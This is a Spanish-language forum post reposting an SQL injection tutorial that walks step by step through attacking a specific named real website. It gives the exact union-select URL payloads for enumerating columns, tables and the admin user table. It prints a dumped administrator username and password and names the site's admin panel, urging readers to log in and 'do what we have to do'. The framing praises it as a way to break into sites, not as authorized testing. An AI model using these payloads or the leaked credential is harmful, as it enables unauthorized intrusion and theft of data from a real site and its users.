Tutorial Sql inyeccion - Por un Black Hat

No se puede negar que esta muy bien explicado y claro que se pueden usar cosas un poco digerentes pero está muy bueno lo recomiendo para los que recien esten empesando en esto del Pen-testing ya que con estas inyecciones pueden vulnerar algunas páginas y aun que me duela reconocerlo esta hecha por un black hat; excelente trabajo Gothic-X

##########################################################################################
## TUTORIAL INJECTION SQL By Gothic-X ##
## ##
## Greetz: Version 1.1 ##
## || Zer0-z0oRg || Zues || Kaos || Dont.Cool || Murder || Knet || Fr34k || ##
## ##
## www.undermx.blogspot.com ##
## ##
## ##
## ##
##########################################################################################

WEB: http://directinformatica.es/
METODO DE ATAQUE: SQL INJECTION

Bueno empesaremos con buscar la parte de la web donde es vulnerable en este caso sera en
http://directinformatica.es/detalle.php?id= verificamos si es vulnerable haciendo una
consulta con solo ponerle ( ' ) una coma.
efectivamente este sitio es vulnerable a sql, como savemos? por que nos arrojo un mensaje de
error el cual es el siguiente.

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gedraqxj/public_html/detalle.php on line 35

el cual nos indica que es vulnerable. bueno agora buscaremos cuantas columnas tiene el sitio agregando
lo siguiente al fina de la url de la web ( detalle.php?id=-1+union+select+0,1,2,3,4,..., en este caso tiene
9 columnas osea quedaria de la siguienteforma.

http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,8--

entrando veremos que nos arrojo unos numeritos en la web en este caso fueron : 8 , 4 , 2 .

ya estando aqui veremos si la web tiene information schema de manera que quede de esta forma:
agregando al final +from+information_schema.tables-- y reemplazando cualquiera de los numeros
nos arrojo la web por table_name quedando la url de la aiguiente manera;

http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema--

perfecto nos arrojo un texto CHARACTER_SETS el cual es una tabla y con eso confirmamos que tiene
information schema, ahora buscaremos la tabla de usuario, usuarios o admin agregando al final
+limit+1,1-- y quedaria de esta forma:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+1,1--

ahora para que encontremos la tabla deseada avansaremos en el primer uno del limit de la siguiente manera. +limit+2,1--
hasta ncontrar la tabla deseada. en esta web se tubo que avansar 20 para la tabla deseada y quedo de la siguiente manera
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+20,1--
y nos dio como resultado: adm_usuario
ahora como ver lo que esta dentro de la tabla, osea ver las columnas, bueno primero convertiremos la tabla a hexadecimal
usualmente uso esta herramienta http://hwagm.elhacker.net/php/sneak.php, bueno nos dio como resultado: 61646d5f7573756172696f
bueno al final de la url de la injection aditaremos el final reemplazando .tables+limit+20+1-- por columns+where(table_name=0xaquitabalaenhex)-- y
donde tenemos table_name lo reemplazamos por column_name y nos quedaria de la siguiente manera.
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,column_name+from+information_schema.columns+where(table_name=0x61646d5f7573756172696f)--
y vemos que nos arroja las columnas y para ir encontrando las columnas deseadas avansamos con +limit+1,1-- cambiando el 1 por 2 y asi susesivamente
hasta encontrar las columnas deseadas.
en esta web encontramos las siguientes columnas:
id_user, id_tipo, nomb_user , nick_user , pass_user , acti_user
bien ya con esas tenemos las esenciales que son nomb_user y pass_user.
ahora como vemos dentro de las columnas? bueno solo reemplazamos el fina despues de +from+ y agregamos el nombre de la tabla que es
adm_usuario y donde tenemos column_name reemplazamos por concat(columna,0x3a,columna) el 0x3a esta en hexadecimal y es ( : ), entonces
nos quedaria de la siguiente manera nuestra url:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,concat(nick_user,0x3a,pass_user)+from+adm_usuario--
y nos arrojara nuestra informacion deseada que es la siguiente: admin:matias1
ahora solo nos falta encontrar el admin panel, en la siguiente web es http://directinformatica.es/cms/
y nos logeamos y hacemos lo que tengamos que hacer.

THE END.

Saludos

Dr.White